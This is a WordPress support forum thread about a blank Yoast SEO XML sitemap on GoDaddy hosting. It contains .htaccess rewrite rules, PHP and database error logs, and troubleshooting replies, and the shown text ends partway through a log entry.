• Resolved WeDev.Africa

    (@mad2kx)


    Hi there,

    my customer has a managed GoDaddy Hosting. We recently installed YOAST SEO to do some improvements. The issue is, that the sitemap is blank.

    When I access domain/?sitemap=1 I can see the sitemap. But when I open domain/sitemap_index.xml the sitemap is blank.

    Any ideas what I can do? Except convincing the customer to move from GoDaddy..

    I added the extra code into the htaccess which did not work

    # Yoast SEO - XML Sitemap Rewrite Fix
    RewriteEngine On
    RewriteBase /
    RewriteRule ^sitemap_index.xml$ /index.php?sitemap=1 [L]
    RewriteRule ^locations.kml$ /index.php?sitemap=wpseo_local_kml [L]
    RewriteRule ^geo_sitemap.xml$ /index.php?sitemap=geo [L]
    RewriteRule ^([^/]+?)-sitemap([0-9]+)?.xml$ /index.php?sitemap=$1&sitemap_n=$2 [L]
    RewriteRule ^([a-z]+)?-?sitemap.xsl$ /index.php?yoast-sitemap-xsl=$1 [L]
    # END Yoast SEO - XML Sitemap Rewrite Fix
Viewing 13 replies - 1 through 13 (of 13 total)
  • Hi @mad2kx,

    If you can get to the sitemap using ?sitemap=1, this means that Yoast SEO is working correctly, but there is something else about the way your site’s configured that may need to be changed.

    If you haven’t already, we recommend checking this guide to common sitemap errors: Common XML sitemap errors

    If that doesn’t help, could you send us an example URL where this problem is happening?

    Thread Starter WeDev.Africa

    (@mad2kx)

    Hi @priscillamc,

    Thank you for your response.

    Yes I went through this already. But it did not help. I even contacted GoDaddy but they blame it on YOAST. Which I highly doubt…

    I can find the https://www.drumcafe.com/?sitemap=1 but https://www.drumcafe.com/sitemap_index.xml is blank.

    Sa?a

    (@stodorovic)

    @mad2kx These rules should be before WP rules (not at the end of .htaccess). Did you check PHP error log?

    Thread Starter WeDev.Africa

    (@mad2kx)

    @stodorovic this is my htaccess

    # Yoast SEO - XML Sitemap Rewrite Fix
    RewriteEngine On
    RewriteBase /
    RewriteRule ^sitemap_index.xml$ /index.php?sitemap=1 [L]
    RewriteRule ^locations.kml$ /index.php?sitemap=wpseo_local_kml [L]
    RewriteRule ^geo_sitemap.xml$ /index.php?sitemap=geo [L]
    RewriteRule ^([^/]+?)-sitemap([0-9]+)?.xml$ /index.php?sitemap=$1&sitemap_n=$2 [L]
    RewriteRule ^([a-z]+)?-?sitemap.xsl$ /index.php?yoast-sitemap-xsl=$1 [L]
    # END Yoast SEO - XML Sitemap Rewrite Fix
    # BEGIN GD-SSL
    <IfModule mod_rewrite.c>
    Options +FollowSymLinks
    RewriteEngine On
    RewriteCond %{HTTPS} !=on
    RewriteCond %{HTTP_USER_AGENT} ^(.+)$
    RewriteCond %{SERVER_NAME} ^drumcafe\.com$ [OR]
    RewriteCond %{SERVER_NAME} ^www\.drumcafe\.com$
    RewriteRule .* https://%{SERVER_NAME}%{REQUEST_URI} [R=301,L]
    Header add Strict-Transport-Security "max-age=300"
    </IfModule>
    # END GD-SSL
    # BEGIN WordPress
    # The directives (lines) between "BEGIN WordPress" and "END WordPress" are
    # dynamically generated, and should only be modified via WordPress filters.
    # Any changes to the directives between these markers will be overwritten.
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress
    Sa?a

    (@stodorovic)

    Rules look good. I can open main-sitemap.xsl for example. It could be memory issue or PHP error or false positive security rule.

    Please check security options/plugin. Did you check logs on CPanel or via FTP? I don’t remember how it works on GD.

    Other issue is that anything-blabla.xml should show 404 page, but it’s similar behavior. Similar as anything-blablaxml or even testxmlbla… Do you have any custom code?

    Thread Starter WeDev.Africa

    (@mad2kx)

    @stodorovic Thank you for trying to help me.

    Even if I try to open main-sitemap.xml or blablaxyz.xml it always shows me a white page. The error logs I checked via FTP they show the following:

    [21-Oct-2020 17:57:37 UTC] PHP Deprecated:  Function create_function() is deprecated in /var/www/wp-content/themes/hyphoria/inc/init.php on line 37
    [20-Nov-2020 19:31:04 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-prodimpexpcsv-admin-screen.php on line 63
    [20-Nov-2020 19:31:04 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-pr_revimpexpcsv-admin-screen.php on line 101
    [20-Nov-2020 19:31:14 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-prodimpexpcsv-admin-screen.php on line 63
    [20-Nov-2020 19:31:14 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-pr_revimpexpcsv-admin-screen.php on line 101
    [20-Nov-2020 19:31:28 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-prodimpexpcsv-admin-screen.php on line 63
    [20-Nov-2020 19:31:28 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-pr_revimpexpcsv-admin-screen.php on line 101
    [20-Nov-2020 19:31:39 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-prodimpexpcsv-admin-screen.php on line 63
    [20-Nov-2020 19:31:39 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-pr_revimpexpcsv-admin-screen.php on line 101
    [20-Nov-2020 19:32:11 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-prodimpexpcsv-admin-screen.php on line 63
    [20-Nov-2020 19:32:11 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-pr_revimpexpcsv-admin-screen.php on line 101
    [20-Nov-2020 19:32:27 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-prodimpexpcsv-admin-screen.php on line 63
    [20-Nov-2020 19:32:27 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-pr_revimpexpcsv-admin-screen.php on line 101
    [20-Nov-2020 19:33:17 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-prodimpexpcsv-admin-screen.php on line 63
    [20-Nov-2020 19:33:18 UTC] PHP Notice:  Trying to get property 'id' of non-object in /var/www/wp-content/plugins/product-csv-import-export-for-woocommerce/includes/class-wf-pr_revimpexpcsv-admin-screen.php on line 101

    The theme has been replaced with a Divi + Child Theme but no extreme customizations just to display different error messages for the WooCommerce Store (empty cart for example). Also the “plugin error” has been resolved by removing the plugin because it is no longer needed.

    I suspect the issue here is with GoDaddy and they simply refuse to understand that their servers are underpowered.

    Plugin Support devnihil

    (@devnihil)

    @mad2kx Have you tried also resetting the permalinks? To do so please perform the following steps:

      ?In WordPress go to SEO>General>Features
      ?For ‘XML Sitemaps’ Toggle the switch to ‘Disabled.’
      ??Click ‘Save Changes.’
      ?Toggle the switch back to ‘Enabled.’
      ?Click ‘Save Changes.’

    ?We also have a guide on how to enable/disable XML Sitemaps here: https://kb.yoast.com/kb/enable-xml-sitemaps-in-the-wordpress-seo-plugin/

    Also, if you have already confirmed that both Yoast SEO and WordPress are up to date and the issue is still occurring, we would next recommend performing a conflict check to determine whether another plugin or theme is interfering with the Yoast plugin. The fastest way to do this is to?deactivate all non-Yoast plugins and switch to a standard theme?like?Twenty Nineteen.?Test this on your development or staging site, if you have one. If not, we recommend using the?Health Check & Troubleshooting?plugin. This plugin allows you to run a conflict check?without affecting normal visitors to your site.

    If you’re unfamiliar with checking for conflicts, we’d like to point you to a step-by-step guide that will walk you through the process:?How to check for plugin conflicts.

    Sa?a

    (@stodorovic)

    You can try to deactivate product-csv-import-export-for-woocommerce, but it’s only PHP notice. I don’t see fatal PHP errors.

    Divi theme forces transient cache for sitemaps and you should try to delete all transients.

    Reset indexables probably doesn’t help.

    It looks that you have some rule which matches ‘xml’ in URL (or custom PHP code – maybe in wp-config.php). Also, it’s possible that some rules are inherited from parent directory (if you have more websites on same account).

    You can try checking plugins conflicts. You can use the plugin “Health Check & Troubleshooting” to temporary activate (only for administrators) only Yoast SEO with a standard theme.

    Thread Starter WeDev.Africa

    (@mad2kx)

    @stodorovic @devnihil I just came across these new log entries after resetting the indexables. Any thoughts on this?

    [20-Nov-2020 21:01:36 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_prominent_words' doesn't exist for query TRUNCATE TABLE wp_tz3c246s0h_yoast_prominent_words made by do_action('admin_post_wordpress-seo-feature-reset'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\Test_Helper\WordPress_Plugin_Features->handle_reset_feature, Yoast\WP\Test_Helper\WordPress_Plugin_Features->reset_feature, Yoast\WP\Test_Helper\WordPress_Plugins\Yoast_SEO->reset_feature, Yoast\WP\Test_Helper\WordPress_Plugins\Yoast_SEO->reset_indexables, Yoast\WP\Test_Helper\WordPress_Plugins\Yoast_SEO->reset_prominent_words_calculation
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1169' AND <code>object_type</code> = 'post' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1169' AND <code>object_type</code> = 'post' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_primary_term' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_primary_term</code> WHERE <code>post_id</code> = '1169' AND <code>taxonomy</code> = 'category' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Primary_Term_Builder->build, Yoast\WP\SEO\Builders\Primary_Term_Builder->save_primary_term, Yoast\WP\SEO\Repositories\Primary_Term_Repository->find_by_post_id_and_taxonomy, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_primary_term' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_primary_term</code> WHERE <code>post_id</code> = '1169' AND <code>taxonomy</code> = 'category' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Primary_Term_Builder->build, Yoast\WP\SEO\Builders\Primary_Term_Builder->save_primary_term, Yoast\WP\SEO\Repositories\Primary_Term_Repository->find_by_post_id_and_taxonomy, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> = '1' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_public_post, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> = '1' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_public_post, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> IS NULL LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_post_with_is_public_null, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> IS NULL LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_post_with_is_public_null, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>permalink</code>, <code>title</code>, <code>description</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noarchive</code>, <code>is_robots_noimageindex</code>, <code>is_robots_nosnippet</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1', 'user', 'https://www.drumcafe.com/author/drumcafe/', NULL, NULL, '0', '0', NULL, NULL, NULL, NULL, NULL, '0', '1', 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', NULL, 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', '2020-11-20 21:01:38', '2020-11-20 21:01:38') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>object_sub_type</code>, <code>permalink</code>, <code>primary_focus_keyword_score</code>, <code>readability_score</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noimageindex</code>, <code>is_robots_noarchive</code>, <code>is_robots_nosnippet</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>primary_focus_keyword</code>, <code>canonical</code>, <code>title</code>, <code>description</code>, <code>breadcrumb_title</code>, <code>open_graph_title</code>, <code>open_graph_description</code>, <code>twitter_title</code>, <code>twitter_description</code>, <code>author_id</code>, <code>post_parent</code>, <code>number_of_pages</code>, <code>post_status</code>, <code>is_protected</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>schema_page_type</code>, <code>schema_article_type</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1169', 'post', 'post', 'https://www.drumcafe.com/post-apple-conference/', NULL, '30', '0', NULL, '0', NULL, NULL, NULL, 'https://www.drumcafe.com/wp-content/uploads/2018/08/news_01-2.jpg', '1813', 'featured-image', '{\"width\":775,\"height\":517,\"url\":\"https://www.drumcafe.com/wp-content/uploads/2018/08/news_01-2.jpg\",\"path\":\"/var/www/wp-content/uploads/2018/08/news_01-2.jpg\",\"size\":\"full\",\"id\":1813,\"alt\":\"\",\"pixels\":400675,\"type\":\"image/jpeg\"}', 'https://www.drumcafe.com/wp-content/uploads/2018/08/news_01-2.jpg', '1813', 'featured-image', NULL, NULL, NULL, NULL, 'APPLE Conference', NULL, NULL, NULL, NULL, '1', '0', NULL, 'publish', '0', NULL, NULL, '1', NULL, NULL, '47:6dac5910761dfb89217dca89a096869a', '2020-11-20 21:01:38', '2020-11-20 21:01:38') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), 